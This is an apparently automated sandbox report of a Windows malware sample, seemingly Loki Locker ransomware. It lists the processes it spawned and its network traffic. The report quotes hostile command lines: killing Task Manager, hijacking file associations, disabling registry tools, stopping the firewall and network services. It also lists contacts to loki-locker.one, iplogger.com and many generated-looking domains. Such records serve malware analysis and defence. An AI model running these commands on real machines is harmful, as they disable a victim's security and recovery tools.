C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C taskkill /im taskmgr.exe /f

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /im taskmgr.exe /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /1

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .png=NotSoCleverBotFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .vbs=NotSoCleverBotFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .html=NotSoCleverBotFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .bat=NotSoCleverBotFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .jpn=EncryptedFile

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C assoc .js=exe1file

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ipconfig /release

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /release

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C net stop Windows Firewall

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\net.exe

net stop Windows Firewall

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Windows Firewall

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C net stop Network Connections

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\net.exe

net stop Network Connections

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Network Connections

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 728

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 150.171.28.11:80 edge.microsoft.com tcp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.230.21:443 js.hcaptcha.com udp
US 104.19.230.21:443 js.hcaptcha.com tcp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 104.19.229.21:443 newassets.hcaptcha.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 api.hcaptcha.com udp
US 8.8.8.8:53 api.hcaptcha.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
NL 108.177.119.94:443 update.googleapis.com tcp
GB 104.86.110.96:443 www.bing.com tcp
US 104.19.229.21:443 api.hcaptcha.com udp
US 104.19.229.21:443 api.hcaptcha.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 8.8.8.8:53 imgs3.hcaptcha.com udp
US 8.8.8.8:53 imgs3.hcaptcha.com udp
US 104.19.230.21:443 imgs3.hcaptcha.com udp
N/A 224.0.0.251:5353 udp
GB 104.86.110.96:443 www.bing.com udp
US 104.19.230.21:443 imgs3.hcaptcha.com udp
US 104.19.229.21:443 imgs3.hcaptcha.com udp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 51.11.108.188:443 checkappexec.microsoft.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
GB 2.18.190.173:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
GB 2.18.66.67:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
GB 2.18.66.72:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 2.18.27.76:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.192.193:443 i.imgur.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
GB 2.18.27.76:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.27.76:443 www.bing.com udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 loki-locker.one udp
US 34.132.102.6:80 loki-locker.one tcp
US 34.132.102.6:80 loki-locker.one tcp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 151.101.2.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 204.79.197.203:443 ntp.msn.com tcp
US 204.79.197.203:443 ntp.msn.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 150.171.73.11:80 edge-http.microsoft.com tcp
GB 2.18.27.76:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 34.110.138.217:443 merino.services.mozilla.com tcp
US 8.8.8.8:53 mc.prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 8.8.8.8:53 mc.prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.110.138.217:443 merino.services.mozilla.com udp
US 8.8.8.8:53 example.org udp
US 8.8.8.8:53 ipv4only.arpa udp
US 8.8.8.8:53 prod.detectportal.prod.cloudops.mozgcp.net udp
US 34.107.221.82:80 prod.detectportal.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 prod.detectportal.prod.cloudops.mozgcp.net udp
GB 2.18.27.76:443 www.bing.com udp
N/A 127.0.0.1:56331 tcp
N/A 127.0.0.1:56342 tcp
US 184.164.136.134:80 tcp
US 184.164.136.134:80 tcp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
NL 142.250.153.105:443 www.google.com udp
US 8.8.8.8:53 qtvghqsrkimpg.co.uk udp
US 8.8.8.8:53 rxwiivmqxhijf.info udp
US 8.8.8.8:53 rkpmnvwtllgme.com udp
US 8.8.8.8:53 soqoobqsykcgm.net udp
US 8.8.8.8:53 slamhlklmeivg.biz udp
US 8.8.8.8:53 tpboiqekadepf.ru udp
US 8.8.8.8:53 andcdonnarvog.org udp
US 8.8.8.8:53 ndelmwabwqyiw.co.uk udp
US 8.8.8.8:53 crnfoeblyeqtg.info udp
US 8.8.8.8:53 phooxmnyvdtng.com udp
US 8.8.8.8:53 cfhidjfhcnruc.net udp
US 8.8.8.8:53 puirmrruymuos.biz udp
US 8.8.8.8:53 ejrloysfbamau.ru udp
US 8.8.8.8:53 rysuxhfsxyptu.org udp
US 8.8.8.8:53 irlyeanlbxwku.co.uk udp
US 8.8.8.8:53 jvmbfixhxcwvt.info udp
US 8.8.8.8:53 kvvcppbjakrpu.com udp
US 8.8.8.8:53 laweqxlfworbd.net udp
US 8.8.8.8:53 kjpfeuffdtsqc.biz udp
US 8.8.8.8:53 lnqhfdpbaxscb.ru udp
US 8.8.8.8:53 mnaipksdcgnvu.org udp
US 8.8.8.8:53 nrbkqsdyyknhd.co.uk udp
US 8.8.8.8:53 digvoisxtdsdo.info udp
US 8.8.8.8:53 qvbhrnorekoso.com udp
US 8.8.8.8:53 ejqvirnvnlleq.net udp
US 8.8.8.8:53 rwlhlwjpxshth.biz udp
US 8.8.8.8:53 hgkvepvgdobbo.ru udp
US 8.8.8.8:53 utfhhuranvwqo.org udp
US 8.8.8.8:53 ihuvxyqewwtcx.co.uk udp
US 8.8.8.8:53 vuphbemxhepro.info udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 hyomitoimcsjr.com udp
US 8.8.8.8:53 ibjmpyihwdhda.net udp
US 8.8.8.8:53 iaymcdjggklkt.biz udp
US 8.8.8.8:53 jctmjidfqlaes.ru udp
US 8.8.8.8:53 lwsmxbrqvnbhg.org udp
US 8.8.8.8:53 mynmfglpgopbo.co.uk udp
US 8.8.8.8:53 mxdmrkmopvtip.info udp
US 8.8.8.8:53 naxmypgnawico.com udp
US 8.8.8.8:53 vhgofhburgtqr.net udp
US 8.8.8.8:53 jubaipniyhxki.biz udp
US 8.8.8.8:53 xlqrqqvfjexek.ru udp
US 8.8.8.8:53 lyldtyisqfcxk.org udp
US 8.8.8.8:53 afkouoedbrcor.co.uk udp
US 8.8.8.8:53 nsfaxwqqisgii.info udp
US 8.8.8.8:53 cjurgxynspgcr.com udp
US 8.8.8.8:53 pwpdjglbaqkvr.net udp
US 8.8.8.8:53 axofyswqkfcbr.biz udp
US 8.8.8.8:53 erzurum.us udp
US 8.8.8.8:53 bajfgbhmraiqq.ru udp
US 8.8.8.8:53 ccyikcrbcdgok.org udp
US 8.8.8.8:53 detirkcwjxmes.co.uk udp
US 8.8.8.8:53 evsfoaaytqkyg.info udp
US 8.8.8.8:53 fxnfvikublqof.com udp
US 8.8.8.8:53 gadiajujloomg.net udp
US 8.8.8.8:53 hcxihrffsjuco.biz udp
US 8.8.8.8:53 idveibbwccigl.ru udp
US 8.8.8.8:53 vqqplgwqmjevl.org udp
US 8.8.8.8:53 jegecqoodukpu.co.uk udp
US 8.8.8.8:53 wrbpfvkincgfl.info udp
US 8.8.8.8:53 kuakiicrpskls.com udp
US 8.8.8.8:53 xiuvlnxlaagbs.net udp
US 8.8.8.8:53 lvkkcxpjqlmuu.biz udp
US 8.8.8.8:53 yjfvfdldbsikl.ru udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 mteucmwhubimo.org udp
US 8.8.8.8:53 nvyujrqgfcwgw.co.uk udp
US 8.8.8.8:53 nuouvckyvtkvx.info udp
US 8.8.8.8:53 owjudhexguypw.com udp
US 8.8.8.8:53 olibctxcirkrk.net udp
US 8.8.8.8:53 pndbjyrbssyls.biz udp
US 8.8.8.8:53 pmsbvjltjkmbm.ru udp
US 8.8.8.8:53 qonbdofstlbul.org udp
US 8.8.8.8:53 bcvwyajwadsem.co.uk udp
US 8.8.8.8:53 opqicivkhewxd.info udp
US 8.8.8.8:53 dggakpwuypnjm.com udp
US 8.8.8.8:53 qtblnxjigqrdm.net udp
US 8.8.8.8:53 dtadyhkrntujt.biz udp
US 8.8.8.8:53 qhuocpwfuuydk.ru udp
US 8.8.8.8:53 fxkgkwxpmgpom.org udp
US 8.8.8.8:53 slfrnfkdthtim.co.uk udp
US 8.8.8.8:53 fsenslfsscbom.info udp
US 8.8.8.8:53 guynatpoawhel.com udp
US 8.8.8.8:53 hwoqebsqrovtm.net udp
US 8.8.8.8:53 hkitssgngsdti.ru udp
US 8.8.8.8:53 imdtabqjnnjjh.org udp
US 8.8.8.8:53 josweitlffxyb.co.uk udp
US 8.8.8.8:53 kqnwlqehmaeoj.info udp
US 8.8.8.8:53 wkpynnvmtytm.com udp
US 8.8.8.8:53 kaqkqsrrlnas.net udp
US 8.8.8.8:53 xpnqhwqnabwd.biz udp
US 8.8.8.8:53 lfockcmsrpdj.ru udp
US 8.8.8.8:53 bauqfilhfmir.org udp
US 8.8.8.8:53 opvcinhmwbox.co.uk udp
US 8.8.8.8:53 cfsiyrgiloli.info udp
US 8.8.8.8:53 puttcwcnddro.com udp
US 8.8.8.8:53 foxvoxowedrc.net udp
US 8.8.8.8:53 gsyajdikvgbm.biz udp
US 8.8.8.8:53 gtvnihjxkfus.ru udp
US 8.8.8.8:53 hxwrdmdlcied.org udp
US 8.8.8.8:53 jedngserpqgh.co.uk udp
US 8.8.8.8:53 kierbxxfhtpr.info udp
US 8.8.8.8:53 kjbfacysvsjx.com udp
US 8.8.8.8:53 lncjuhsgnvsi.net udp
US 8.8.8.8:53 hyrhfwxbyrgy.biz udp
US 8.8.8.8:53 uossifkdrmuj.ru udp
US 8.8.8.8:53 jhpkpgsidjgt.org udp
